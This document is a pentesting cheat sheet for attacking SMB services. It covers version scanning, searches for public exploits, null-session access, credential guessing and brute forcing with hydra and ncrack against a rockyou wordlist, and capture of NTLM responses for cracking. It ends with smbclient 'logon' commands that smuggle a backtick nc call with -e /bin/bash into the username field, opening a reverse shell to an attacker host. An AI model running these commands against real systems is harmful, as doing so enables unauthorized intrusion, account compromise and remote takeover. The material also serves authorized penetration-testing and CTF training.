SMB Enumeration

What does SMB stand for?

==> Server Message Block is a network protocol used to provide shared access to files, printers, and serial ports between nodes on a network.

==> SMB servers can be accessed through command-line tools such as smbclient or through a file browser. The service listens on TCP port 445 (direct SMB over TCP) and, on NetBIOS-enabled hosts, also on TCP port 139 (SMB over the NetBIOS session service).

SMB Versions?

==> SMB1 was the first implementation of SMB. It used 16-bit packet sizes and small data buffers, which greatly limited performance, and it has no encryption for data in transit at all, which is why it is considered insecure. In addition, it is highly susceptible to MITM attacks.

==> SMB2 improved performance by moving to 32-bit data sizes and 128-bit file handles, and it substantially reduced the number of commands sent for common operations. Security improved through stronger packet signing (HMAC-SHA256) to counter MITM attacks, but there is still no built-in encryption.

==> SMB3 added further performance and security enhancements such as multichannel and end-to-end encryption using AES, as well as secure dialect negotiation (and, in 3.1.1, pre-authentication integrity) so that newer clients can detect a downgrade and enforce a secure connection.

nmap -A -T4 -p 139,445 -oN nmap.log <IP>     // Aggressive scan (-A): OS detection, version detection, default scripts and traceroute.

A basic step in enumerating SMB is to identify the version the server is running, as this helps determine whether any publicly available exploit for that version can be abused to obtain remote code execution (RCE).

If the above fails, start a connection with Nmap or any tool capable of connecting to an SMB share while capturing the traffic with Wireshark. The Negotiate Protocol and Session Setup exchange reveals the hostname of the machine, the SMB dialects offered and chosen, the operating system version, and other useful information.
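As an added example (my code, not part of these notes), here is a small Python parser for the two messages that Wireshark shows first in that exchange: the SMB1 Negotiate Protocol Request carrying the dialect list the client offers, and the SMB2 NEGOTIATE response carrying the dialect and signing policy the server chose. The sample frames are constructed inline by the build_* helpers (they stand in for a capture; nothing here talks to a real server), and the 4-byte NetBIOS/direct-TCP transport header that both port 139 and port 445 use is stripped first.

```python
import struct

# Dialect revision codes a server returns in an SMB2 NEGOTIATE response (MS-SMB2 2.2.4).
SMB2_DIALECTS = {
    0x0202: "SMB 2.0.2",
    0x0210: "SMB 2.1",
    0x0300: "SMB 3.0",
    0x0302: "SMB 3.0.2",
    0x0311: "SMB 3.1.1",
}

def strip_transport(frame: bytes) -> bytes:
    """Drop the 4-byte NetBIOS session / direct-TCP header (type 0x00 + 3-byte big-endian length)."""
    if frame[0] != 0x00:
        raise ValueError("not a session message")
    length = int.from_bytes(frame[1:4], "big")
    return frame[4:4 + length]

def parse_smb1_negotiate_request(msg: bytes) -> list:
    """Dialect strings a client offers in an SMB1 Negotiate Protocol Request (SMB_COM_NEGOTIATE, 0x72)."""
    if msg[:4] != b"\xffSMB" or msg[4] != 0x72:
        raise ValueError("not an SMB1 negotiate request")
    word_count = msg[32]                                        # SMB1 header is 32 bytes
    params_end = 33 + 2 * word_count
    byte_count = struct.unpack_from("<H", msg, params_end)[0]
    data = msg[params_end + 2: params_end + 2 + byte_count]
    # Each dialect is a 0x02 buffer-format byte followed by a NUL-terminated ASCII string.
    return [chunk[1:].decode("ascii") for chunk in data.split(b"\x00") if chunk.startswith(b"\x02")]

def parse_smb2_negotiate_response(msg: bytes) -> dict:
    """Dialect and signing policy from an SMB2 NEGOTIATE response (MS-SMB2 2.2.4)."""
    if msg[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    command = struct.unpack_from("<H", msg, 12)[0]
    flags = struct.unpack_from("<I", msg, 16)[0]
    if command != 0x0000 or not flags & 0x00000001:            # NEGOTIATE, SMB2_FLAGS_SERVER_TO_REDIR
        raise ValueError("not a negotiate response")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", msg, 64)  # body follows 64-byte header
    if structure_size != 65:
        raise ValueError("unexpected negotiate response structure size")
    return {
        "dialect": SMB2_DIALECTS.get(dialect, "unknown (0x%04x)" % dialect),
        "signing_enabled": bool(security_mode & 0x1),           # SMB2_NEGOTIATE_SIGNING_ENABLED
        "signing_required": bool(security_mode & 0x2),          # SMB2_NEGOTIATE_SIGNING_REQUIRED
    }

# --- Constructed sample frames (stand-ins for what Wireshark would show) ---

def build_smb1_negotiate_request(dialects) -> bytes:
    header = b"\xffSMB" + bytes([0x72]) + b"\x00" * 27         # command byte, then zeroed status/flags/ids
    payload = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = b"\x00" + struct.pack("<H", len(payload)) + payload  # WordCount=0, ByteCount, dialect list
    msg = header + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg

def build_smb2_negotiate_response(dialect: int, security_mode: int) -> bytes:
    header = (b"\xfeSMB"
              + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0x0000, 1, 0x1, 0, 0, 0, 0, 0)
              + b"\x00" * 16)                                   # 16-byte signature, zeroed
    body = struct.pack("<HHHH", 65, security_mode, dialect, 0) + b"\x00" * 57  # remaining fields zeroed
    msg = header + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg

def summarize(frame: bytes) -> str:
    msg = strip_transport(frame)
    if msg[:4] == b"\xffSMB":
        return "client offers: " + ", ".join(parse_smb1_negotiate_request(msg))
    info = parse_smb2_negotiate_response(msg)
    return "server chose %s, signing %s" % (
        info["dialect"], "required" if info["signing_required"] else
        "enabled but optional" if info["signing_enabled"] else "disabled")

if __name__ == "__main__":
    print(summarize(build_smb1_negotiate_request(["NT LM 0.12", "SMB 2.002", "SMB 2.???"])))
    print(summarize(build_smb2_negotiate_response(0x0311, 0x01)))
```

A client that lists only "NT LM 0.12" is SMB1-only; a server that answers 0x0311 with signing enabled but not required is the usual workstation default, and that "optional" state is what relay attacks depend on.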

Usage :
        search aux smb version                         // If you don't remember how to spell "auxiliary" xD
        use auxiliary/scanner/smb/smb_version          // Metasploit module
        show options
        set RHOSTS <IP>
        run

The SMB version is identified by the auxiliary/scanner/smb/smb_version Metasploit module, which reports the dialects the server negotiates and, where available, its OS and build.

Searching Publicly Available Exploits?

searchsploit microsoft smb <smb version or windows version>

If nothing is found, the alternate plan is to search the Metasploit Framework.

msf> search type:exploit platform:windows smb        // narrow further with the Windows version as a keyword

==> Alternatively, if nothing works, don't hesitate to check vulnerability databases such as CVE, NVD and VulDB. They mostly carry advisory and patch documentation; Exploit-DB is the one that typically contains the actual exploit code :)

Null Session Attack?

smbclient -N -L //192.168.1.15         // -N: no password prompt (SMB null session), -L: list shares.

A null session lets a user connect to SMB remotely with an empty username and an empty password.

Usually this only grants access to the hidden IPC$ (inter-process communication) share, which carries RPC pipes rather than files.

Through those pipes a null session can be used to gather more information about the host, its users and its network, and where share permissions are lax, to access data stored in the shares.

Nmap Scripts?

smb-enum-shares     // Enumerates SMB shares in an SMB server.

smb-brute          // Performs brute-force password auditing against SMB servers.

smb-system-info   // Collects system information through SMB/NetBios.

smb-vuln-*     // Checks whether the SMB server is affected by the known vulnerabilities Nmap has scripts for.

It is good to run smb-enum* to collect all general information about the server and smb-vuln* to collect more information about any known exploits that might affect the server.

nmap --script=smb-enum*,smb-vuln* 10.10.10.102 -p 139,445 -Pn -n --disable-arp-ping

Common Credentials?

A few common usernames and passwords such as admin, administrator, root and test should be tried if null sessions are disabled on the remote SMB server.

This is quieter than brute-forcing (a handful of attempts, little risk of locking accounts) and it is the first thing that should strike us when we pentest any network service :)

smbclient -U '<username>' -N //10.10.10.124/IPC$     // One candidate name with an empty password; -U takes a single user, not a file, so loop over your list.

SMB authentication can also be tested with the auxiliary/scanner/smb/smb_login Metasploit module.

msfconsole -q
search aux scanner smb
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS <IP>
set USER_FILE users.txt     // or SMBUser / SMBPass for a single pair
set PASS_FILE pass.txt
run

Bruteforcing Credentials

hydra [-L users.txt | -l user_name] [-P pass.txt | -p password] -f [-s port] smb://<IP address>     // -f: stop on first valid pair, -s: non-default port

=> A brute-force attack tries many username/password combinations against the service until one succeeds and gives access to the machine.

=> Network cracking tools such as hydra can be used to perform brute-force attacks against online services such as FTP, HTTP, SMB, etc.

=> In most cases it is really a dictionary attack: hydra walks a list of usernames and passwords rather than every possible string. Keep account-lockout policies in mind before spraying a domain.

Packet Sniffing

Packet sniffing is the practice of capturing and logging the packets that pass through a network.

Traffic over older SMB versions (SMB1, and SMB2 as well unless SMB3 encryption is negotiated) on ports 139 and 445 is unencrypted.

An attacker positioned on the network can therefore read every file transferred and capture the NTLM challenge/response of every authentication. Passwords themselves are not sent in the clear; what is captured is the client's response to the server's challenge.

With LM/NTLMv1 (the SMB1 era) that response is weak enough to be cracked quickly; with NTLMv2, which is what a modern SMB2 client sends, it still has to be cracked offline by guessing candidate passwords with tools such as john or hashcat. Only SMB3 encryption hides the exchange from a sniffer.

We can capture and inspect all of this with Wireshark ;)

While pentesting a box or an application, if we see ports 139 and 445 open, the first things that should strike us are:

nmap --script smb-protocols -p 139,445 <IP>     // Lists the SMB dialects the server accepts (SMB1 still enabled?).
--------------------------------------------------------------------------------------------------------------------------------
smbclient -N -L //<IP>                To identify what shares are present (null session).
smbclient -N //<IP>/<share name>      Null-authentication login to a single share.
smbclient --no-pass -L <IP>           Same as -N.
-------------------------------------------------------------------------------------------------------------------------------
enum4linux -a <IP> | tee enum4linux.log        Enum4linux is a great tool to enumerate Samba/Windows shares, users, groups and password policy in one go.
-------------------------------------------------------------------------------------------------------------------------------
smbmap -H <IP>
smbmap -H <IP> -u '' -p ''                SMBMap enumerates share drives and their permissions across an entire domain.
smbmap -H <IP> -s <Share name>            Query one share.
-------------------------------------------------------------------------------------------------------------------------------
rpcclient -U "" -N <IP>            Null-session RPC; if successful, then:
> enumdomusers
> enumdomgroups
> queryuser [rid]
> getdompwinfo
> getusrdompwinfo [rid]
------------------------------------------------------------------------------------------------------------------------------
crackmapexec smb <IP> -u '' -p '' --shares
crackmapexec smb <IP> -u 'sa' -p '' --shares
crackmapexec smb <IP> -u 'sa' -p 'sa' --shares
crackmapexec smb <IP> -u '' -p '' --share <Share name>
--------------------------------------------------------------------------------------------------------------------------------
ncrack -T 5 <IP> -p smb -v --user <Username> -P /usr/share/wordlists/rockyou.txt
--------------------------------------------------------------------------------------------------------------------------------
mount -t cifs "//<IP>/share/" /mnt/wins                                      Mount a share (prompts for a password; add -o guest for an anonymous mount).
mount -t cifs "//<IP>/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0    Force SMB1 for old servers that don't speak SMB2+.
---------------------------------------------------------------------------------------------------------------------------------
smbclient -U "username%password" //<IP>/share_name         After a successful login,
smb> logon "/=`nc <attack box IP> 4444 -e /bin/bash`"         the logon command can be abused from the SMB shell to get a reverse shell.
smb> logon "/=`nohup nc -nv 10.10.14.6 4444 -e /bin/sh`"     Only works where the Samba server passes the supplied username to a shell (the "username map script" misconfiguration).
---------------------------------------------------------------------------------------------------------------------------------
